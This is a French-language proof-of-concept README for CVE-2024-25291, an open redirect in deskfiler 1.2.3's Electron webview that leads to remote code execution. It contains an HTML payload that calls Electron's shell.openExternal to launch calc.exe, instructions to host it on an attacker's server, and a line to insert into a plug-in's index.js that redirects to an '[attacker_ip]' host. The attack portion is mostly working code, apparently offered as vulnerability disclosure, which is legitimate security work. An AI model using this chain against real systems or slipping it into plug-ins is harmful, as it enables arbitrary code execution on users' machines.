
deskfiler 1.2.3 Open Redirect exploit
Une preuve de concept pour la vulnérabilité CVE-2024-25291.
deskfiler - 1.2.3 permet d'utiliser Electron webview dans l'application, ce qui entraîne l'exécution de code à distance.
Dans ce dépôt, il y a un exemple d'application vulnérable et une preuve de concept (POC) d'exploitation.
<html>
<head>
<title>jruru</title>
</head>
<body>
<script>
const { shell } = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe');
</script>
</body>
</html>
※ Si vous voulez le tester rapidement, créez un serveur sur le PC de l'attaquant avec le code suivant.
$ python -m http.server 80
Remarque : ※ À ce stade, il est supposé que le plug-in est un plug-in généré par l'attaquant, et qu'il s'agit seulement d'un plug-in normal avec un code ajouté pour permettre l'accès au serveur de l'attaquant. BareBone a été sélectionné pour des tests simples.

Ensuite, ajoutez le code suivant au fichier index.js dans le chemin du dossier BareBone.
window.location='http://[attacker_ip]/hack.html'


Dans cette PoC, nous avons utilisé un plug-in ; cependant, nous pensons qu'avec des vecteurs d'attaque alternatifs, il est possible d'obtenir une exécution de code à distance (RCE) de manière indépendante. De plus, si des vulnérabilités côté serveur telles que XSS stocké, XSS réfléchi existent, la RCE est également considérée comme réalisable.